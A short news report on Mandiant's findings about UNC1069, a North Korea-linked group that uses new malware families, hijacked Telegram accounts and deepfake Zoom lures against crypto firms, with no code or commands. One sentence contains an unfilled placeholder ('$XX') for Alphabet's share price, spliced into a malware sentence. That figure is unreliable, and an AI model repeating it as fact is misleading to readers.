Mandiant, which operates under Google Cloud, has identified an escalating North Korea-linked cyber campaign targeting cryptocurrency and fintech firms with advanced malware and AI-enabled social engineering.
The threat cluster, tracked as UNC1069, deployed seven distinct malware families designed to harvest and exfiltrate sensitive data, marking a significant expansion of activity first monitored by Mandiant in 2018.
“This investigation revealed a tailored intrusion resulting in the deployment of seven unique malware families, including a new set of tooling designed to capture host and victim data: SILENCELIFT, DEEPBREATH and CHROMEPUSH,”
Mandiant said in its report.
The campaign leveraged compromised Telegram accounts and staged fake Zoom meetings featuring AI-generated deepfake videos, with victims tricked into running hidden commands in so-called ClickFix attacks.
Two newly identified malware strains, CHROMEPUSH and DEEPBREATH, were engineered to bypass key operating system protections and extract personal data, and following the announcement the Alphabet share price was unchanged at $XX.
Mandiant said artificial intelligence tools enabled the suspected North Korean actors to scale operations from November 2025, introducing AI-enabled lures into active campaigns targeting crypto companies, software developers and venture capital firms.
The warning follows a string of North Korea-linked crypto incidents, including freelance developer infiltrations in 2025 and the $1.4 billion hack of Bybit attributed to the Lazarus Group, underscoring persistent cyber risks across the digital asset sector.